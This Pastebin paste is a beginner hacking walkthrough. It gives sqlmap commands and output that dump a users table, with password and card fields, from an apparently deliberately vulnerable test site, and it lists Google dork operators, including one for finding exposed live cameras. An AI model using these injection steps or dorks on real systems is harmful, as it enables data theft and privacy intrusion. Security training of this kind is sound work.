Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQLMAP
- =======
- Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
- Step 1: Open Your Linux Terminal
- Step 2: python sqlmap -u http://testphp.vulnweb.com/search.php?test=query --dbs
- Here We can see we got these below databases.
- [09:54:16] [INFO] fetching database names
- available databases [2]:
- [*] acuart <------- Target Database
- [*] information_schema
- Step 3: Get the tables of the database
- python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -D acuart --tables
- here We got all the tables available in the acuart database
- [09:58:49] [INFO] fetching tables for database: 'acuart'
- Database: acuart
- [8 tables]
- +-----------+
- | artists |
- | carts |
- | categ |
- | featured |
- | guestbook |
- | pictures |
- | products |
- | users |-------> Target Table
- +-----------+
- Step 4: Get the columns of the users table
- python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -T users --columns
- Output:
- Database: acuart
- Table: users
- [8 columns]
- +---------+--------------+
- | Column | Type |
- +---------+--------------+
- | address | mediumtext |
- | cart | varchar(100) |
- | cc | varchar(100) |
- | email | varchar(100) |
- | name | varchar(100) |
- | pass | varchar(100) |---> Target
- | phone | varchar(100) |
- | uname | varchar(100) |---> Target
- Step 5: Get the data from the columns of the above table.
- python sqlmap -u http://testphp.vulnweb.com/search.php?test=query -U test -T users --dump
- Output:
- Database: acuart
- Table: users
- [1 entry]
- +---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
- | cc | name | cart | pass | uname | phone | email | address |
- +---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
- | De nave queimando asfalto | Hiago Junior | a929b42ddb394d84a486976ac5782afc | test | test | 2323345 | jurandir@gmail.com | foda-se |
- +---------------------------+--------------+----------------------------------+------+-------+---------+--------------------+---------+
- =x=x=x=x=x=x=x=x=x=x=x=x=x==x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=
- GOOGLE DORKING
- ================
- Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected. Hackers use Google Dorking to extract only the Desired Data what they exactly want.
- DORKS COMMANDS
- =================
- = intitle : This allows a attacker to search for pages with specific text in their HTML = title. So intitle: “login page” will help a hacker to find out the web titled “login page”.
- = inurl : This allows a hacker to search for pages based on the text contained in the URL eg. “inurl : login.php”.
- = intext : This operator searches the entire content of a given page for keywords supplied by the attacker.
- = site : limits the scope of a query to a single website.
- = cache : This shows the attacker the cached/previous stored version of a website.
- = filetype : THis helps in differentiating a attacker the filetype/extension of a particular file he/she is searching.
- = indexof : This will helps in finding out the whole index a website is saving for multile files and is open to surf.
- = Finding Live Cameras - (inurl = “/view/view.shtml?id-”) the resultant will be having the live cameras of Axis Company.
- \
- Google Hacking Database --> ghdb -> https://www.exploit-db.com/google-hacking-database/
- =x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement